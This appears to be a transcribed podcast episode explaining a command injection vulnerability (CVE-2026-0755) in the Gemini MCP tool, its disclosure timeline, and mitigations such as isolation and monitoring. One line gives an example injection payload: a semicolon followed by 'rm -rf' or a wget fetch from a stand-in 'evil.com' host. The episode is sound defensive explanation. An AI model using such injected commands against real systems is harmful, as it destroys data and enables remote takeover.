9.8
Out of 10.
out of 10. And, in our line of work, we usually see scores like that reserved for the absolute nightmares.
Yeah, the Log4j, the Eternal Blues.
Exactly. The stuff that wakes CISOs up in a cold sweat at 3 in the morning. I mean,
Oh.
usually that number is attached to some massive enterprise server or a nation-state exploit tool.
It is uncomfortably close to perfection if your definition of perfection is total system compromise.
Mhm.
A 9.8 basically means the front door isn't just unlocked.
It's gone.
It's been removed entirely.
Right. And today we are not talking about a legacy Windows vulnerability or some dusty old server protocol. We are talking about a tool that sits right at the bleeding edge. A tool designed to connect the smartest AI models on the planet to the real world.
Which makes the nature of the flaw even more jarring. We are looking at the Gemini MCP tool. It connects Google's Gemini models to the Model Context Protocol services. It sounds incredibly futuristic.
It does.
Yet the vulnerability that's cracking it open is something we've been fighting since, the late 90s?
It's a complete collision of the future and the past. Welcome back to the Deep Dive. Today, we are unpacking a really critical security flaw, CVE-2026-0755, in the open-source Gemini MCP tool. And before we even get into the code, I think we need to set the stakes for everyone listening. This isn't some theoretical paper we're discussing.
No, this is a live fire exercise. This is a zero-day vulnerability.
There is no safety net.
Exactly. As of late January 2026, so right now while we are recording this, there is no official patch. The vulnerability is out there. The exploit details are public because the disclosure timeline ran out. And if you have this tool running exposed to the internet, you are effectively open for business to anyone who knows how to send a network packet.
So we have severity score of 9.8, a tool used to give AI agency over your systems, and no update button to click. That is a terrifying combination for anyone running a modern AI stack.
It is the perfect storm. You have high impact, low complexity to attack, and zero barrier to entry. It's rare to see all those dials turned up to 11 at the same time.
So let's play detective on this one. We have the body, the vulnerable system. We have the weapon remote code execution. Now we need to figure out how the killer got in.
Mm-hmm.
But first, let's just clarify the victim here.
Right.
We mentioned the Gemini MCP tool. I think most of our listeners know Gemini is Google's LLM, but
Yeah.
MCP might be a new acronym for some.
It's becoming a standard pretty quickly. MCP stands for Model Context Protocol. Think about the biggest limitation with large language models right now. They are brilliant, reasoning engines, but they are brains in a jar. They're isolated.
Right.
A standard instance of Gemini or GPT-4, it can't see your local file system, it can't access your internal PostgreSQL database, and it certainly can't run code on your server.
They're sandboxed for safety, yeah. So
Yeah.
MCP is the standard way to break that sample.
And controlled access is the preferred term, but yes. MCP acts as a universal translator. It provides a standardized way for an AI model to interface with external data and tools, what we often call context. The Gemini MCP tool is a utility, a bridge, really, that allows a developer to connect Gemini to these MCP servers easily. It translates the AI's intent into actual system commands to fetch data or perform actions.
And that translation layer is where the risk lives. Because if I'm giving an AI permission to read my proprietary code repo to help me refactor it, or giving it permission to query my customer database, I'm implicitly trusting the tool that facilitates that connection.
You are granting it agency. And when you grant agency to software, you have to be absolutely certain that the software only takes orders from you. The problem with this vulnerability is that it allows anyone to give those orders.
Which brings us right back to that CVSS score, 9.8. The report from Cybersecurity News breaks this down into 3 key vectors that I want to unpack: network, privileges, and user interaction. So let's start with the network vector, AVN.
This is the most straightforward part. AVN simply means the attack is remote. The hacker doesn't need physical access. They don't need to be in the server room or plugged into the local switch.
They can do it from anywhere.
From a coffee shop in a different hemisphere, as long as they can reach the port the tool is listening on.
Which, for a tool designed to be a server-side bridge, is, it's standard functionality. But then we have the second metric, PRN, or privileges. None. This is one that usually makes security architects lose sleep.
It should. Privileges, none, means the attacker bypasses the bouncer entirely. They don't need a username. They don't need a stolen password, an API key, a session token.
Not a thing.
They don't need to be an employee. The system doesn't ask, who are you?
Yeah.
Before processing the request.
So the door isn't just unlocked. There is no door.
Effectively, yes. In many dev tools, authentication is left as an exercise for the user, meant to be handled by a reverse proxy or a firewall. But if you expose the tool directly, it welcomes everyone.
And the final nail in the coffin is UIN, user interaction. None.
Which means the victim you, the admin, doesn't need to do anything. No phishing links to click, no malicious PDFs to download, no accept buttons to press. You could be asleep.
Wow.
As long as the service is running, the exploit works.
To use a physical security analogy, it's not just that you left a key under the mat. It's like you took the front door off its hinges, replaced the mat with a pane of clear glass, and installed a neon sign pointing at it saying, "Free compute here."
And once they are inside, the payload is RCE, remote code execution.
The 3 scariest letters in tech.
Without a doubt. RCE means I can run my commands on your machine. And here is where the context of AI makes this even worse. We aren't talking about a guest account on a web server. This is a tool designed to integrate AI, which often requires broad access to read code bases, interact with file systems, or access network resources.
So the permissions are already high.
The permissions attached to that service account are likely very, very generous.
So if the Gemini MCP tool has read-write access to my project folder to let the AI edit code, the attacker now has read-write access to my project folder.
They inherit the permissions of the tool. They can exfiltrate your environment variables, which probably contain your AWS keys or database passwords. They can install crypto miners, or they can use your server as a jump box to attack the rest of your internal network.
Yeah.
It's game over for that machine.
Okay, so we've established it's a catastrophe. But as someone who spends a lot of time looking at code, I have to ask, how? I mean, we are in 2026. We have automated linters. We have AI coding assistants that scream at you if you write bad code. We have decades of OWASP top 10 lists. How does a tool explicitly designed for advanced AI ship with a vulnerability this massive?
It is the ultimate irony, isn't it? We're building the future on infrastructure that forgot the lessons of the past. The vulnerability here isn't some complex, novel cryptographic failure or a race condition in the neural network.
It's got to be something simple.
It's command injection.
You're kidding me. That's practically Security 101. It's the little Bobby tables of system administration.
It really is. The source analysis points to a specific culprit in the code base, a method called execAsync.
execAsync. Okay, for the Node.js developers listening, I imagine their ears just perked up. That's a wrapper around the standard child process.exec function, isn't it?
It is, and here is the problem with exec in Node.js. It spawns a shell. It effectively opens a command prompt like binch on Linux or cmd.exe on Windows, and it types in whatever string you give it.
Ah, I see where this is going. If I'm a developer, I use exec because it's convenient. I want the tool to run system command, maybe to list files or start a process, so I just pass the command string. But the problem is, where did that string come from?
That is the million-dollar question. In this case, the Gemini MCP tool takes user-supplied input arguments intended for the MCP server and passes them directly into that execAsync call.
Directly is the dangerous word there. No filter, no sanitization.
No adequate validation, according to the report. Think about it this way. The system expects you to send a command argument like filey.txt, but exec is dumb. It just executes the string. It doesn't know the difference between a file name and a command.
So if I'm the attacker, I send filey.txt followed by, say, a semicolon.
And then rm-rf or wget http.evil.com allware.sgsh.
Because
it's a stark reminder that while the intelligence of the AI model is skyrocketing, the plumbing connecting it to the real world is still being built by humans who make human mistakes. We are giving these models hands, but we are building the hands out of brittle materials.
Now, finding a bug like this is one thing. I mean, software has bugs. That's the reality of the industry. But the response to this bug, or rather the lack of response, that's a whole other controversy. The timeline in the source material paints a pretty frustrating picture of the open source supply chain.
Frustrating is putting it mildly. This is a classic case study in supply chain ghosting, and it really highlights the risks of relying on what I call demoware in production.
Walk us through the timeline. This didn't just pop up yesterday.
No, the clock started ticking on July 25, 2025. That is when the vulnerability was first reported to the vendor via a third-party platform.
July 2025. So we are talking fully 6 months before the public knew. That is a massive window for a vulnerability of this severity to just sit there.
It's an eternity in cybersecurity terms. Standard disclosure windows are usually 90 days. You give the vendor 3 months to fix it before you tell the world. 6 months implies something else is broken in the communication chain?
Then in November 2025, Trend Micro's Zero-Day Initiative, ZDI, steps in.
Right. ZDI is a heavy hitter in the research world. When they get involved, it's usually because the initial reporting channels have stalled or failed. They reached out to the vendor, effectively saying, hey, this is critical. You have a 9.8 score vulnerability here, allowing RCE. Are you there?
And the response?
Silence.
Missed.
Effectively. By December 14th, 2025, ZDI had had enough. They informed the vendor of their intent to publish. This is the nuclear option in ethical hacking. You tell the vendor, look, we can't let users stay vulnerable forever. If you don't fix it, we are going to tell the world so they can at least protect themselves by turning it off.
It's the speak now or forever hold your peace moment.
And the vendor held their peace. So on January 9, 2026, the disclosure went public. And even now, as we record this at the end of January, the source material confirms there is still no official patch.
Why does this happen? Is it just negligence?
It's often just the reality of open source. We see the word vendor in these reports, and we imagine a big company with a 247 security operations center. But the Gemini MCP tool might be a project maintained by a small team or even a single developer who wrote it over a weekend, pushed it to GitHub,
I moved on.
and then got busy with life or a new job. That's the abandonware risk.
Right.
You download a tool because it solves your immediate problem connecting Gemini to your server. You see it has some stars on GitHub. You don't check if the repository has been updated in 6 months.
Right.
You don't check if the maintainer is still active. You build your sophisticated AI workflow on top of it, and suddenly you are relying on code that has been left to rot.
It really highlights the danger of the modern software supply chain. We treat these piping tools as utilities like water or electricity. We just assume they work and are safe.
But in reality, they are often just someone's side project that hasn't been audited, and malicious actors know this. They scan GitHub for these abandoned projects, look for easy exploits like execAsync, and then they scan the internet to see who is running them.
So let's pivot to survival mode.
Yeah.
We have listeners who might have this tool running in a Docker container somewhere or maybe on a dev server they forgot about. There is no patch. You can't just npm update your way out of this. What do you actually do?
Well, the ZDI advisory is very clear, and it starts with the absolute non-negotiable: isolation.
Do not expose to the internet.
That is rule number 1. If this tool is sitting on a public IP address, take it down. Now, it needs to be behind a firewall, accessible only via a VPN, or locked strictly to a local development machine localhost only.
But even on a local network, privileges. None means anyone inside the network can hit it, right? If I'm on the corporate Wi-Fi, I can hit your dev box.
Which brings us to step 2. Trust boundaries. You have to treat the service like an unlocked safe full of dynamite. You don't put that in the lobby, you put it in a vault. Ensure that the only devices or users that can route packets to that tool are ones you explicitly trust.
So network segmentation. Put it in a VLAN where it can't talk to your finance server or your domain controller.
Exactly. Don't let the AI tool talk to anything it doesn't absolutely need to. And finally, since we can't fix the code itself without forking it, we have to watch the behavior. Monitoring.
What does that look like specifically for a tool like this? What should sysadmin be looking for in the logs?
You look for unusual outbound connections or suspicious process execution.
Give me a concrete example.
Okay, so this is a Node.js process. It should be receiving HTTP requests and talking to Gemini APIs. If your Gemini MCP tool process suddenly tries to spawn a shell, if you see bench or cmd.exe appearing as a child process of the tool, that is a massive red flag. A connector tool shouldn't be opening command prompts.
Right. Or if it tries to initiate a download using curl or JIGET from an unknown IP address in a different country, that's the attacker trying to pull down their payload or their crypto miner.
Correct. It's about knowing what normal looks like. Normal is receive request, talk to Gemini, return text. Abnormal is spawn shell, download file, delete database.
But we have to be honest here. Monitoring is a band-aid.
It is. Monitoring tells you that you are being hacked. It doesn't stop the vulnerability. The only real fix is to modify the code yourself, to sanitize that input switch execAsync, to spawn, or wait for the community to fork the project and fix it, since the original vendor seems to be absent.
This has been a sobering look at the state of things. We get so wrapped up in the capabilities of the models. Can it reason? Can it pass the bar exam? That we forget the boring stuff holding it all together. So to recap for everyone, we have CVE-2026-0755,
Right.
a 9.8 critical vulnerability in the Gemini MCP tool.
Driven by a classic command injection flaw in execAsync that allows anyone with network access to execute arbitrary code on the system.
And it remains unpatched after more than 6 months of warnings. So if you are using this, get it off the public internet immediately, verify your network isolation, and maybe audit the code yourself.
And I'd add one more thing. Take a hard look at the other bridge tools in your stack. This likely isn't the only utility that was written quickly to jump on the AI bandwagon.
That is the thought I want to leave everyone with today. We spend so much time worrying about the big AI risks. Will the model hallucinate? Will it be biased? Will it become sentient and launch the nukes?
But the real danger right now isn't Skynet.
No. The real danger is the little Python or JavaScript utility you downloaded to connect to Skynet, which turns out to have a typo in line 400 that lets a teenager in a coffee shop delete your hard drive.
We are building skyscrapers on foundations made of code we didn't write, don't understand, and don't maintain. This bug is a wake-up call to verify the structural integrity of those bridges.
Verify the bridges. Words to live by in 2026. Thanks for diving in with us. Check your logs, patch or hide your systems, and we'll see you in the next deep dive.
Stay safe out there.